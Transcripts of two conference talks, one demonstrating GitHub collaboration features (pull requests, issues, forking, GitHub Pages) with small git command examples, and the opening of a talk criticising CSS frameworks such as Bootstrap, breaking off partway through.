I'm going to check out strange ascetic. And now we see we have a Poems directory with that file in it. So I can do some more work down here at the command line. If I had been a heathen, I'd have praised Neaera's curls, filled my life with love affairs, my house with dancing girls. Trust me, this is going somewhere good. Completely classy poem. You have nothing to worry about. So I'll just add it and commit it, assuming that we kind of basically know some command line Git stuff. And if you don't, I can connect you with some people who can help. So here we are. Make that commit and push it. And as I push that work and I go back up here and into this PR, that new commit shows up down at the bottom, as Neaera. And actually, the cool thing is, if you're on the pull request page and new commits come in, they're auto-detected and they just show up in front of you. So if it's an active pull request, you will just see the page changing in front of you. So let's just consider this good for now. It doesn't really look done, but I'll say this isn't quite right, but you can't make an omelet without breaking a few eggs. That's kind of an American idiom that means essentially YOLO. Now what I just did there is I went to my desktop, Explorer, Finder, whatever, grabbed a GIF, dropped it into this comment box. Comment boxes are a magical place. Not only does markdown work, not only does emoji work, but they are drag and drop targets. And when I drop a file on there, it just uploaded that to this place, cloud.githubusercontent.com, whatever on Earth that is, and replaced the drop target with markdown pointing to that file. So now that image, that's how those people were getting those images in there. Just drag and drop. It's as simple as that. So YOLO, it's not done, but we're going to merge it anyway. And there we go. The pull request is now closed. This conversation is basically over. And when I go back to my main pull requests tab, that is gone.
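The command-line portion of that loop, branch, edit, add, commit, push, can be sketched end to end. This is a self-contained sketch that uses a local bare repository as a stand-in for GitHub; the branch, file, and commit-message names are just illustrative:

```shell
# Self-contained sketch of the branch/commit/push loop from the talk.
# A local bare repository stands in for GitHub; all names are made up.
set -e
tmp=$(mktemp -d)
git init --bare -q "$tmp/origin.git"        # pretend this is the GitHub remote
git init -q "$tmp/work"
cd "$tmp/work"
git config user.email "demo@example.com"
git config user.name "Demo"
git commit --allow-empty -q -m "initial commit"
git remote add origin "$tmp/origin.git"
git push -q origin HEAD
git checkout -q -b strange-ascetic          # the topic branch for the poem
mkdir -p poems
echo "If I had been a heathen" > poems/ascetic.txt
git add poems/ascetic.txt
git commit -q -m "Kick off the poem"
git push -q origin strange-ascetic          # the new commit now shows up in the PR
```

Every push to the topic branch lands on the open pull request for that branch, which is why the new commit appears at the bottom of the PR page.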
Number six is gone from the list. So if you don't mind, I'm going to look at a few of these and just kind of see what people are thinking. Here someone has edited the readme. And what they have done is, as you can see, removed that last bullet. So now I am not permitted to use American slang. And the bummer about that is, you know how it is. Sometimes it just comes out, and you don't know you're doing it. So I don't know if I can really merge this. I'm going to think about it. I'm going to say, I can't make any promises. All right. I'm going to let that sit on the side for a few minutes. Dgram says it needs more squirrel. Now what did he do? Yeah, he added a bullet for additional squirrels. That sounds good to me. Now this is a diff. This is a diff of a markdown file. And it's a trivial markdown file. So there are, I think, zero people in the room who are confused about what's going on right now. Somebody added a line, and it shows up with a plus and in green. You saw the line that was removed had a minus, and it was red. You get it. What is harder is when it's a complex piece of text with lots of stuff that has changed. I'm going to try to come up with a more interesting version of this in a few minutes. But I want to point you to these two tabs. They're very easy to overlook. "Source" is pressed, so I'm looking at the source, the actual markdown. When I click on "rendered", now I see the rendered markdown with, and I don't know, can you see? It's very faint on the projector and on the confidence monitor here, but a really faint kind of lime green highlighting to that line. So if you compose text, non-code text, in Markdown or AsciiDoc or Textile or a format that GitHub supports, the prose diffs will show red and green markers and strikethrough and everything of how the file has changed. Super helpful. Louder? David, does that apply to syntax highlighting code? I don't think it does. No. No, I had to ask a GitHubber, and he says no.
Now there's another speaker at the conference here who was actually instrumental in this feature. There's a GitHubber here who helped build some of this. So it's cool stuff. I can't tell you how many times when I'm working on text, and it's not in a GitHub repo, that I want this. You want to know what's changed. I have a 17-year-old daughter, and I was collaborating with her on an email she was going to write to a bunch of people. It was a couple paragraphs. It was no big deal. I made some changes, and I just sent them back to her in an email. I felt like a total jerk. Like, how's she supposed to know what changed? If it's not inside a repo, how do you know what's going on? So it's a good idea to try to get this stuff in a repo, to get text like this in here, and you get some nice stuff. So I'm going to go with David's squirrels. Looks good to me. Going to ship it. And David says, metal. Good. All right. One more pull request. I want to see some more trouble that you guys have made. Somebody has complained about cats. Yeah, OK, fine. That's enough of that. All right. So when I go back to master, I want to see what we've got. Now I see in my readme, we have squirrels and cats, and American Slang is still there. We'll come back to that pull request later. I'll ask you towards the end if I got away with no slang. Now let me go back to my command line and see what's happened. Now I just merged things into master. I'm still on my strange ascetic branch. I don't know if I really need that right now. So I'm just going to go check out master. And I'm going to do a pull. That's going to update master. So now I'm all up to date with the stuff that's gone on up there. Thanks for your help. And we can see in the log, some neat things have gone on. That's the evidence of merged pull requests that have happened in the repository. So we'll let that play out. We'll take a look at that as work proceeds. And a little bit of cleanup here.
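The sync he just did, and the cleanup he's about to do, look like this end to end as a self-contained sketch. A local bare repository stands in for GitHub, and the branch name is just the one from the demo:

```shell
# Post-merge sketch: update the default branch, then delete the merged topic
# branch locally and on the remote. A local bare repo stands in for GitHub.
set -e
tmp=$(mktemp -d)
git init --bare -q "$tmp/origin.git"
git init -q "$tmp/work"
cd "$tmp/work"
git config user.email "demo@example.com"
git config user.name "Demo"
git commit --allow-empty -q -m "initial commit"
git remote add origin "$tmp/origin.git"
git push -q origin HEAD
git checkout -q -b strange-ascetic
git commit --allow-empty -q -m "poem work"
git push -q origin strange-ascetic           # the branch exists on the remote now
git checkout -q -                            # back to the default branch
git merge -q strange-ascetic                 # stands in for the merged pull request
git push -q origin HEAD
git branch -d strange-ascetic                # delete the local branch
git push -q origin --delete strange-ascetic  # delete the remote copy too
```

The `--delete` push is what removes the branch from GitHub, which is the same thing the "delete branch" button on a merged pull request does.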
You know what, folks? My branch, my strange ascetic branch, I don't really need that anymore, do I? So let's go ahead and delete that. And we will push that delete up to GitHub. We don't need that branch to exist up on GitHub anymore either. That looks pretty clean. I like the look of that. So I'll go back up here. Just give us a refresh. There are still some pull requests lurking around there. But I want to go remember what it is we're supposed to be doing. I need to keep my eye on that agenda because we only have an hour together, about another half hour together. So what we've done is we've looked at the web flow. We've looked at pull requests. I want to tweak this a little bit. Instead of those bullets, I'm going to put a dash and square brackets instead of just a regular bulleted list. This is another thing you can do with issues. Let me update that. Now it becomes a checklist. And I can check those things off. That actually modifies the state of the issue. If I go back and edit that again, you can see there are X's there. So issues are a super handy way to keep track of things. And this is not unusual for code you're going to write. There might be, here's six things we need to make sure happen. You can make it a checklist like that. So our agenda is now a checklist. We're skipping ahead and we're focusing on issues right now. So some things we can do. Ah, Fred. Good point. We'll get there. That's one of the places I want to go. An undocumented URL hack. Issues. Now let's go back and look at our list of issues. The first thing I notice is that three issues showed up that I didn't create. That's because those are the issues that correspond to pull requests. Every pull request has a corresponding issue. In fact, you can think of a pull request as an issue with code attached to it. But that's not all we have. And we happen to have those. But I want to create another one because there is a bug in the strange ascetic.
It was pointed out in the PR, but TLBerglund merged it anyway. We don't have a URL emoji for Cowboy. Now I just did another thing. I mentioned somebody. I mentioned myself, of course, but at and then the GitHub username, like I could say, hey, dgram, could you weigh in on this too? So I just mentioned David Graham. David Graham is going to get either an email or a web notification or both, depending upon how he has his notifications set up. But I have pulled that guy in. He's subscribed to this thread now. He's going to get notified of everything that happens in it, probably, depending upon how his settings are configured. But he certainly got an email when I mentioned him, or a notification of some kind. So I got his attention, brought him into the discussion. He doesn't have anything to say right now. He's usually a man of few words. That'll probably happen later. But here we go. This is a second issue. Now, I wonder, ah, there you go. David just weighed in. He said, sounds good. Thanks, David. I can't recall the issue number of the first pull request I created. Was that one or two? I can't remember. I want to reference it here. I want this issue to be linked back to that other work I was doing. So I want to say, for reference, you should see. And if I knew the number, I could just type the number right now. Like if it was issue 645, that would just work. I don't know the number. But I think it said something about poem in it. There it is. OK, that's right. So I want to link to an issue. A link to an issue is a pound sign and the issue number. And then those two issues are connected. I'll get a hyperlink in the history. A lot of people don't know that that works at all. And it's super cool for kind of keeping track of the relationships between things. If you want to say that one issue depends on another, you could indicate that with a link.
If you don't remember the number of the issue, you can just start typing some words from the title, which I did there, kicking off a new poem. Oh yeah, that's right. It's number 6. I'll hit Enter. And I get that. So now this issue, number 8, is linked to issue number 6. I could follow that link. And issue number 6 is linked back to 8. So when I link to an issue or a pull request, that issue or pull request automatically gets a link back to me. So we can connect things in that way. And I'll point out again, this comment box, all the same stuff we've had all along. I can drag and drop. I have GitHub, Flavored, Markdown. I even have the so-called Zen mode where I can edit full screen. This, in my opinion, is a temptation to create very long posts and issues. And there are at least two problems with that. So be careful. If you're going to use Zen mode, don't yield to that temptation. Or just don't use Zen mode. That's also pretty safe. But it's there if you want it. All right, so what do we got? We've got mentions. We've got links. We have tags. Now, I haven't done anything really useful with tags yet. But for example, this guy, I might label this as a bug because it is a bug. Needs more squirrel. That sounds like that is an enhancement. And those exist already. If there are other labels that don't exist, well, I'm free to create those the way I want. Like I would create a label called Poem. And Programmer Poem and Bug in the Strange Ascetic, those are both associated with Poems. So I'll apply those labels. And now, obviously, I'm able to filter issues by labels. So labels are meant to be the emergent metadata system in GitHub issues. You can't go into an issue and say, hey, I want every issue to have these six other fields to it. There's no custom metadata. There's just the discussion thread plus the tags. But you can use tags for pretty flexible things. That works out fairly well. All right. I want to do one more thing with issues. 
I want to do one more thing with prose edits. So how's this going to work? Now, I'm going to go down to the command line again. Make sure we're up to date here. Cool. We're up to date. I'm going to go make a new branch. Now, I created a branch and switched to it in one command. That's that checkout -b bugfix. And now I'm going to edit ascetic.txt: if I had been a heathen. I'll add that. And I'm going to commit it as well. Well, no. There we are. I have Git configured on my system to use TextMate as my default commit editor. Right out of the box, Git uses vi as the default commit editor. I love vi for editing small amounts of text. I don't have a problem with it at all. But TextMate is a little more fun. So I've configured Git to use TextMate. That's why that popped up like that. Now, what I want to say here is, you know, fixed verb form in first line. So that's a pretty bad message. I'm not a really big fan of that. What I really want is to indicate that it fixes an issue. I don't remember off the top of my head what issue that was. So we'll just go back. And that's bug in the strange ascetic. That's issue number eight. We see that eight right there. All right. So I'm going to go here. And I'm going to say this fixes number eight. Or I could say closes number eight. I'll save. I'll push. There, let's do this right. I'll go into the strange ascetic issue. I'll do the push. No, I won't do the push. Good deal. OK. So I just pushed that bug fix into a branch. This issue number eight, and I put that magic text, fixes number eight, this issue is still open because I pushed the fix to something that wasn't master. All right. Now, that fixes message is magical. And GitHub will find that. But it'll only find it when it's committed to the default branch. And the default branch, by default, is master.
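That "magic text" follows GitHub's issue-closing keyword convention. Here is a minimal sketch of such a commit in a throwaway local repo; the file name and issue number are just the ones from the demo, and GitHub only acts on the keyword once the commit reaches the default branch:

```shell
# Sketch of a commit message using GitHub's issue-closing keywords.
# When a commit like this lands on the default branch, GitHub closes issue 8.
set -e
tmp=$(mktemp -d)
git init -q "$tmp/repo"
cd "$tmp/repo"
git config user.email "demo@example.com"
git config user.name "Demo"
echo "If I had been a heathen" > ascetic.txt
git add ascetic.txt
git commit -q -m "Fix verb form in first line

Fixes #8"
# "Closes #8" and "Resolves #8" (and their variants) work the same way.
git log -1 --format=%B                       # show the full commit message
```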
And that's what it is right now. So let me fix that. What would you say I should do? I think maybe I should make a pull request. That seems responsible to me. So let me create a new pull request where I'm going to compare bug fix into master. All right. And you may notice it's a little smarter about what's going on here. It says, well, you took one line away and you added one line. Really what you did is you added the word had. So that's good. Let me create that pull request. I'm going to leave all that as the defaults. We're back in the pull request view. And that's kind of funny. I was just looking right now for the source and rendered buttons that we saw before. Is anybody willing to guess why there is no source and rendered button on the screen right now? Because it's a text file, nothing to render. Well, sure there's something to render. It's rendered. You can see it right here. This is just what it looks like. So maybe if we have time, I'll play with a markdown file a little bit and we can see that prose diffing take place. And we also automatically have word diffing showing up in this text file for us. So that's a nice hint there. I'm going to go ahead and merge. David really wants me to move ahead with this thing. We have another squirrel. And for that, I'm going to find an appropriate animated GIF for David. Upload an ominously named GIF. Wait for it. Don't pause there. So cruel it's pausing. It's even worse. I might not be able to make you wait for it. All right, now we can watch it all the way through. Touch the spider. I believe this is a spider from Australia. If you talk to an Australian about these, everybody's got a story. And finally. Oh, it's so horrible. OK, merge it. That's what I say to squirrels. And now, and also by the way, this happened, this popped up before and I didn't highlight it. GitHub has said, well, you've merged the branch. You probably don't need it anymore. Let's keep things clean and delete that branch.
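A quick note on the word diffing mentioned above: GitHub renders it in the PR view, and the closest command-line analog is Git's `--word-diff` option. A self-contained sketch in a throwaway repo:

```shell
# GitHub shows word-level diffs in the PR view; locally, the analogous
# feature is git diff --word-diff. Throwaway repo; text is from the demo.
set -e
tmp=$(mktemp -d)
git init -q "$tmp/repo"
cd "$tmp/repo"
git config user.email "demo@example.com"
git config user.name "Demo"
echo "If I been a heathen" > ascetic.txt
git add ascetic.txt
git commit -q -m "before"
echo "If I had been a heathen" > ascetic.txt
git diff --word-diff               # shows {+had+} inline instead of whole lines
```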
And now when I go back to look at issues, what is missing? There's a bug in the Song of the Strange Ascetic. Issue number eight is no longer shown here because it's a closed issue. I click on closed and there we go. It's closed because I wrote that text in the commit message and then later merged that into master. That shows up as closed there. All right. Let's go back to the agenda. That is probably all the fun we have to have with issues. The other best thing to do with an issue is simply to close it once the work is done. But these, again, you can use these not just for bugs and features, but really for organizing work. I have worked in capacities in the past where a lot of my activity from day to day was coordinated and I collaborated with other people through comments on issues. And I think that's one of the best things about this way of working. I think we have adequately covered animated GIFs. I hope so. I would like to cover forking briefly just so everybody has a clear idea what that means. And then we'll look at GitHub Pages and probably have a couple minutes for rebasing. So forking. Here we are in the view of my repository. And there are seven of these. So seven intrepid, no, six intrepid audience members have clicked that button. And these are those people. Tlberglund, he doesn't count. You always count as a fork of your own repo. But those people, Dgram, Jep13, Glenn Beck, not to be confused with the American television personality of the same name. All of those people have forked and they have done work. Some of them have even submitted pull requests. But I'm able to see who's done this. What it means to fork is simply to have your own copy of the repository.
So this is, and I may be mispronouncing the way you like that to be read, but Glenn Beck: instead of tlberglund, NDC Oslo 14, this is Glenn Beck, NDC Oslo 14. And I can't edit this. It's not my repository. It's public, but only Glenn is able to edit this unless he adds collaborators. So there's a lot to this. This is how GitHub enabled open source development in the way that it did. I can have a repository. And let's say there are three people that I trust to work on that code with me. Now that's human trust. That's expensive to create. You actually have to know human beings. For someone you don't know to become trusted, you have to develop a relationship. That's an expensive, non-scalable thing. It involves talking, maybe having drinks together, you know, whatever it is that you do to make friends with people. That's what you do. And that trusted group of collaborators is a small group. I'd like a nice small group of people who own the repo that I trust. But I want anybody to be able to make changes to it and send me those changes. That's what forking accomplishes. And Glenn here had clicked on my fork button and created this copy. Now this is his. I can't go in and edit this. Only he can. When he's done, he can send me a pull request. I showed you a pull request inside a repo. They kind of started as a way to work across forks. And let me, it's pointing back to me here. It says, oh, this is a fork of tlberglund. I can still fork, believe it or not, because I'm a member of a few different organizations on GitHub. So I can create a fork of this that doesn't belong to tlberglund. I can't fork to tlberglund because that's where I am. But I could go fork to, here are some work repositories. Here are some other open source things. DOSug, that's the Denver Open Source Users Group. You know, I could go into the Denver Open Source Users Group. That's a user group I run back where I live in Denver. And actually create a fork. I just did that.
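On the command line, working with a fork usually means keeping two remotes: your fork ("origin") and the original repository, conventionally added as "upstream". Here is a self-contained sketch of that shape, with local bare repositories standing in for the GitHub-hosted original and fork:

```shell
# Sketch of a fork workflow: your fork is "origin", and the original repo is
# added as a second remote, conventionally named "upstream". Local bare
# repositories stand in for the GitHub-hosted ones; names are illustrative.
set -e
tmp=$(mktemp -d)
git init --bare -q "$tmp/upstream.git"       # the original repository
git init -q "$tmp/seed"
cd "$tmp/seed"
git config user.email "demo@example.com"
git config user.name "Demo"
git commit --allow-empty -q -m "upstream work"
branch=$(git rev-parse --abbrev-ref HEAD)    # master or main, depending on Git
git push -q "$tmp/upstream.git" "$branch"
git clone -q --bare "$tmp/upstream.git" "$tmp/fork.git"   # the "Fork" button
git clone -q "$tmp/fork.git" "$tmp/work"     # clone your fork to work locally
cd "$tmp/work"
git remote add upstream "$tmp/upstream.git"  # keep a line back to the original
git fetch -q upstream
git merge -q "upstream/$branch"              # sync your fork with the original
```

You push your own branches to origin and open pull requests against upstream; fetching and merging from upstream keeps the fork from drifting behind.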
Now DOSug has NDC Oslo 2014. And DOSug, people who are collaborators in the DOSug organization can now edit that thing. There you have it. So that's forking. Now, if you think about it, forking is conceptually similar to branching. Branching is a way to split work off and have a conversation about it. And have that work be tentative and then make a decision whether to merge the pull request. Forking is a way to split work off and have a conversation about it. And have that work be tentative with respect to whether you're going to merge the pull request. They're both the same when you look at them that way. What is different? Branching is a thing that you do inside a repository when everybody is a collaborator on that repo. Everybody has rights to push to that repo. Forking is a thing you do to manage permissions and manage the asymmetry of trust. I, as a user of an open source project, trust that project. Those collaborators don't know me from Adam. They don't trust me. To manage that, we have forking. It's a great system. So it's conceptually similar to branching, but fundamentally it manages permissions, which branching does not. Branching does not ever manage permissions. Okay. Last feature on our agenda. Let's keep things checked off. That was forking. Last thing I know I want to get to is GitHub Pages. This is cool stuff. So let's do it. Now, this readme. What do you think? That's awkward. I think I'd get some red cards if I was being rated on the readme alone. I think I would get a lot of red cards. There's not much to it. Now, I can go into that readme and I can put pictures in there. Let me show you. Just as a hack. This is an aside, but it's a good aside. I want to show you how I do this. I would like this readme to have an image. Just a little more spice for the repository. Okay. Now, markdown gives me a syntax. That's an image, but I need the image hosted somewhere. Okay. How do I do that? Well, here's how. I'm going to blow that away.
I'm going to go over here. Here's an open issue. This will work. Oh, milestones. Yeah, thanks. Maybe. Here I am. I have an open issue. I'm going to go to my awesome library of animated GIFs. We're going to go with the tank crushing the cars. It seems like an American kind of thing. I don't want to post that to this issue. This is my agenda issue. A tank crushing cars has nothing to do with my agenda. That's weird, but I just needed that markdown. I'm going to copy that. That's amazingly cute, David. No, I tell you what. I'm not going to settle for that. If it's cute you want, instead of the violent and militaristic tank crushing the cars, I'm going to give you a cute dog. All I did was drag the picture into an issue comment to get the markdown, then cut it, so it's gone from the issue. I was cheating. I was using it as a hack to borrow free web hosting from github.com. Now I've done that. That image has been uploaded to their cloud hosting thing, and now that markdown is in my readme. I will commit that. What's that? Is there any sort of quota? I think there's a per-upload quota of five megs. I don't think they really notice if you upload a lot of things. Maybe somebody's watching something and you'll get an email. Typically the way they deal with that kind of thing, if you're getting a little crazy, they'll email you and they'll say, hey, bro, what's going on? They don't shut it down. They're more like, did you mean to do that, or could you stop? There have been sort of implicit denial of service attacks by image files getting deep linked and sort of going viral, and that's happened. Anyway, the point is, here we are. The point is that's cute, and that is now on my project page. And it doesn't get any cuter than that. But still kind of lame as a website. And readmes can get quite elaborate. You can do a lot of good things. Gentlemen, are we good? Okay, just to make sure. I thought I had somebody calling time down there. By my clock I have nine minutes.
Do we have nine minutes? Do I have agreement on that? Outstanding, okay. I would like a web page instead of just a readme. So I'm going to go to Settings here, down at the bottom. Haven't visited Settings yet. That dog is so cute. And in the middle is this block called GitHub Pages. This is the free web hosting built into every GitHub repository. I'm going to use the automatic page generator. Now, if you already have a website, you're a designer, you have a designer, you play a designer on the Internet, whatever it is, you've already got web content. You don't have to go through this. I don't have any, and I'm not going to make you watch me live code HTML. So I'm just going to click on Automatic Page Generator right there. And this gives us GitHub Power Tools from NDC Oslo 2014. That's my project name. Now, let me make that the tagline. And I can just click on that button, and my readme just got sucked in to be my front page web content. All right, good, because I still want that cute dog in there. Let's continue to Layouts. And now I get these nice professionally designed templates that are way prettier than what I'd come up with. I like Midnight, but it doesn't fit the dog. Tactile. No, guys, you know, I hate to say this. I'm going to have to go with Merlot today. That works for me. Okay, so I'm going to publish that. And it says it may take up to 10 minutes to activate. It gives me this URL here. Now, let's just take a look at that URL. Okay, it says timberglund.com slash NDC Oslo 2014. It says timberglund.com, because I've got some other config in my account that maps things to that custom domain. By default, what's going to happen is, so this is github.com slash tlberglund slash NDC Oslo 2014, right? That's the name of the repository. By default, that is going to go to a site called, and I will just open a tab and say it's going to go to a site called tlberglund.github.io slash NDC Oslo 2014. You can see the formula.
If you don't have a custom domain mapping, that is where your site is going to go. And I should be able to navigate there, and it just redirects to timberglund.com. But here you go. Here's my website. Built into my repository. Now, one last trick. Where is that thing? And it's a website. Do I have to edit it in the browser and edit HTML in the browser? I mean, that's a terrible way to live. So let me just do a fetch and see what I get. Okay, it's pulling some stuff down. I have a new branch called gh-pages. Let me check that out. Let me do a directory listing. Now, usually when you look at a branch, it looks kind of like your project, just with some different files. Before I had readme.markdown and poems. Now I have a website. So GitHub Pages is just that. GitHub Pages is a website built into your repository on this separate branch that's completely disconnected from the rest of your history. So Git history is a graph, right? And if you never do GitHub Pages, it's a connected graph. From any commit, you can at least navigate down to the root commit. Once you get the gh-pages branch in there, it's now a disconnected graph or a multigraph, and you've got this other history, which I can go in there and edit. See, where's my list of things to do? Yeah, an li. There we are. Let's just say, oops. Add a little bit of markup there. Oops, I used some slang. I'll push back to my gh-pages branch, and it doesn't always refresh instantly. Sometimes there's some stuff that has to happen on the back end. But there you go. You notice that change I made to the markup locally is now reflected on the web. So if you want a nice project page that's an actual web page and not just a stylish readme with pictures in it, you can do that. It's built in, it's for free, to an actual front-end professional, unlike the guy who's standing on the platform right now who is not a front-end professional.
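That disconnected history is what Git calls an "orphan" branch: a branch whose first commit has no parents. This is a minimal local sketch of the idea, not the exact commands GitHub's page generator runs behind the scenes:

```shell
# Sketch of why the pages branch is a disconnected history: it starts as an
# "orphan" branch with no parent commits, holding only web content.
set -e
tmp=$(mktemp -d)
git init -q "$tmp/site"
cd "$tmp/site"
git config user.email "demo@example.com"
git config user.name "Demo"
echo "poem" > ascetic.txt
git add ascetic.txt
git commit -q -m "project work"
git checkout -q --orphan gh-pages            # new branch with no parents
git rm -r -f -q .                            # start from an empty tree
echo "<h1>NDC Oslo 2014</h1>" > index.html
git add index.html
git commit -q -m "first pages commit"
git rev-list --count HEAD                    # only one commit on this history
```

The project's commits are still in the repository, but nothing on gh-pages points back to them, which is exactly the multigraph shape described above.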
You can give this to a web person, and they can actually just work on it like a regular site. You can even branch within gh-pages, and merge, and use Git to control this content. It works perfectly naturally. And then when you push work back to gh-pages, the site is updated. It isn't just HTML; Markdown works too. You can put all of your web content in Markdown, and that works. And there is a framework on top of Markdown. I'm not going to show it to you, but I want you to remember this. A framework called Jekyll. Now there is a Jekyll renderer built into GitHub Pages. And it was kind of built as a static blogging framework. And it's possible to manage some moderately sophisticated content using Jekyll and GitHub Pages. And have fragments and containers of things like blog posts or comments or speaking events or whatever you might want on a personal website like that. It's all right there. You can use Jekyll to do that. There are some great examples of Jekyll sites out in the wild. Jekyll is fairly well documented by itself. And a nice thing to use inside Pages. So that pretty much brings us to time. Let me go back to my agenda. We'll click off that. We didn't get to rebasing. Didn't think we would. And I'm going to say we did look at prose diffing a little, but not much. I'm going to leave that as unchecked and just strike through rebasing and say, this session has been shipped. Ah, a cute raccoon. And when I close this issue, I say thank you very much. Have a great day. Remember to vote on your way out. There's the cards, throw a card in the box. Have a good one.
Most developers think of Git and GitHub as two sides of the same coin, but all too often our attention is focused on the Git side alone, and not on the capabilities of GitHub as a collaboration platform. Millions of people have already joined the site that offers amazing features like pull requests, project pages, integrated web site hosting, issue tracking, prose collaboration tools, permission controls, and easy integration with third-party services. Come to this talk to learn how to make better use of GitHub through the site's commonplace and advanced features alike.
10.5446/50644 (DOI)
All right. Good morning. Can everyone hear me okay? Great. Excellent. We might have a couple of people still trickling in, but I'll go ahead and get started. This is Build a Better Bootstrap. If this is not where you were intending to be, it's okay. You can leave now and I won't judge. My name is Tim G. Thomas. This is my second year, and I'm very honored to have been chosen to speak here. It's a great conference with amazing attendees. I love the city. It's a great place to be. So I'm very, very happy to be here. I work for Frog Design in Austin, Texas. We're a digital innovation agency with offices all over the world. We sadly do not have one in Oslo yet, but rest assured that when I get back, I'll try to see if I can finagle an office to be opened up here. If you'd like to hear more of what I have to say, I rant a lot on Twitter at Tim G. Thomas, and I also blog at TimGThomas.com. A couple of the topics that I'll be speaking on today I've blogged about in the past and will likely be blogging on in the future as well. So if you decide to follow me, I'd appreciate it. And then one other thing: a former co-worker of mine suggested that I create little hashtags for each of my talks to keep the conversation going, both during the talk, so you can speak to each other over Twitter, and afterward. I've got a column set up in my TweetDeck for the hashtag BetterBootstrap. So if you have any questions that I didn't get to cover during the talk, or maybe there wasn't enough time at the end, or you're just feeling anti-social, you're welcome to tweet anything with that hashtag. You don't have to tweet at me, and I'll be watching that throughout the day and for the conference. I like to communicate that way. So without any further ado, I'd like to get started by talking about what's wrong with Bootstrap.
Okay, maybe that's a little bit of a troll, and maybe the title of the talk was a little bit of link bait, because I don't necessarily want to spend an entire hour bashing Bootstrap. I know a lot of developers who like Bootstrap and who use it on a great number of projects. I've used it on a number of projects myself. And it certainly has its place. I don't want to give you the impression that I feel that we should do away with Bootstrap and all of its competitors. But I feel that we typically bring it out when we're building applications a little more often than we necessarily need to. And I'll talk about why that is shortly. But I want to make this a little more generic by saying what's wrong with CSS frameworks in general. And the first thing that I'll say is that they're relatively large. And I don't mean that in the sort of generic, oh, they're big sort of way. I literally mean relatively large. They're large in relation to what you might be able to write for your own projects. Take Bootstrap, for example. Okay, I said I wasn't going to bash on Bootstrap, but it is a well-known example. The code, I pulled this down off the latest version of Bootstrap: it's 113 kilobytes minified, if you include the sort of default theme that they provide. The unminified version is larger still. This isn't horrible, especially in the days of including Angular or Ember in your application, which I think Ember, last time I checked, was like 600 kilobytes even minified, or something along those lines. So it's not a horrible amount of space. But it is space, and it is space that you may not necessarily need all of. I was talking with another speaker this morning, and we were mentioning that even still there are ways that you can get this file size down, but still it's larger than maybe if you wrote stuff just specifically for your types of applications.
Many of these CSS frameworks feature similar appearances across the instances where you use them. The best example is this button that I can instantly recognize on many, many sites. It's becoming a little more difficult to recognize if this is Bootstrap because I feel a lot of other CSS frameworks have actually taken the same visual style and applied it to their buttons too. But normally this or maybe the little light blue glow that you see over input boxes, dead giveaway that the site you're using typically has Bootstrap on it. And this reminds me of another type of visual treatment that we sometimes used to see on buttons. Our good friend, the Aqua button, back from the early OS X days. And I remember not very fondly the days of web design where every button had to look exactly like this because that was the thing. I don't necessarily think that the Bootstrap style is a fad in the same way that this was. And fortunately this is no longer a fad, at least not in the same way. But it is sort of the default. And so if you just drop Bootstrap in or any of the other frameworks, your sites and apps are going to look about the same. Now you can extend this, right? I mean that's the whole point. There are many developers and designers that have spent a lot of time and energy learning Bootstrap and extending it with custom themes. But unfortunately, this brings me to my next point, some of these frameworks are a little difficult to extend. Now this is admittedly a very opinionated type of comparison, but I personally have worked with Bootstrap on this kind of extension for a long time and I have found it very, very difficult to extend. One of the reasons why, or some of it's CSS selectors. This is an example pulled from the Bootstrap code. I actually ran it through the site, CSSStats.com, which I recommend everybody run all of your CSS through. 
It doesn't necessarily give you any hard recommendations on what to fix, but you become more aware of potential shortcomings in some of your CSS if you run it through CSS Stats. So this particular CSS selector has four components to it. We have a direct child selector, the little caret or greater-than sign, and we have a plus for an adjacent sibling. So if you're using Bootstrap and you use this particular element combination, panel-default with the heading, the collapse, with a sibling of collapse that has a child of panel-body, and you wanted to do something different with it: this was sort of the whole reason for cascading style sheets, so you could write your own styles and have them cascade when you needed that. If you wanted to override one of the styles that's defined in here, you'd have to have at least the exact same selector, so that the specificity would be such that your rules would override Bootstrap's rules. Now, if you want to know a little bit more about specificity, Estelle Weyl has a great illustration of it. I don't want to talk too much about CSS specificity in this talk, but it is an important concept, and it's the source of most of my pain points working with Bootstrap. It turns out that there are actually something like 1,800 selectors in Bootstrap. Not all of them are as specific as the one we just saw, but there are a number of them there. The other thing there's a number of are !important directives. If anyone was at Anthony's talk previous to this (amazing talk, by the way, and if you didn't get a chance to see it, definitely check out the video when it comes out), he also mentions that "bang important" is not necessarily something you really want in your CSS all that often, but there are 43 of them in Bootstrap's main code. I didn't look in the theme file; this is just in the main Bootstrap.
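As a concrete sketch of the override problem just described: the first rule below paraphrases the Bootstrap panel selector from the slide (treat the exact class names and color as approximate), and the later rules show why a simple override fails.

```css
/* Roughly the Bootstrap rule from the slide: a four-part selector */
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ddd;
}

/* A plain class selector loses: its specificity (0,0,1,0) is far
   lower than the rule above (0,0,4,0), so this is ignored. */
.panel-body {
  border-top-color: tomato;
}

/* To win, you end up repeating the entire selector in your own CSS. */
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: tomato;
}
```

This is exactly the "cascade back" problem: instead of one short rule, your stylesheet accumulates copies of the framework's long selectors.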
Also, if you're unfamiliar with this little code snippet (I forget where I got it), you can grep for !important, or anything else for that matter, in a file or even a whole directory, and pipe that into the wc command, and it'll tell you how many instances there are. So I normally run this as part of my build process and fail the build if there are any !important directives. If you're ever on my team, don't use !important; I promise you'll regret it. Now, all of these things about these frameworks are improving, right? We're getting smaller file sizes for Bootstrap and all of the others out there. I mentioned before there's the customizer tool where you can pick and choose certain things from the framework. There are a lot of themes coming out; there are incalculable numbers of themes for Bootstrap and many of its competitors as well. So similar appearance isn't quite as big of an issue as it was. The extension points are also getting better: if memory serves, the number of !important directives in Bootstrap used to be much, much higher than 43, so it's much better now. They also seem to have done away with a lot of the ID selectors that I remember from the earlier days. So everything is doing fairly well in that regard. So all these things are getting better. Do you still need to not use it? Well, if there's one thing that I can say negatively about all CSS frameworks, it's that none of them is actually targeted at just your needs. Now, I've personally found Bootstrap works very well for static content sites, if I'm making some sort of marketing site or something. The types of UI paradigms and design patterns that the Bootstrap team uses work very well for that. But many of the times that I'm working on apps, and your mileage may vary, but I imagine many of you may have similar experiences, are on business apps.
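The counting trick mentioned a moment ago, grepping for the directive and piping the matches into wc, might look like this (the file name demo.css is invented so the example is self-contained):

```shell
# Create a small throwaway stylesheet for the example.
cat > demo.css <<'EOF'
.a { color: red !important; }
.b { float: left; }
.c { display: none !important; }
EOF

# Count occurrences of !important; -o prints one match per line,
# so wc -l gives the total number of matches.
count=$(grep -o '!important' demo.css | wc -l)
echo "count: $count"

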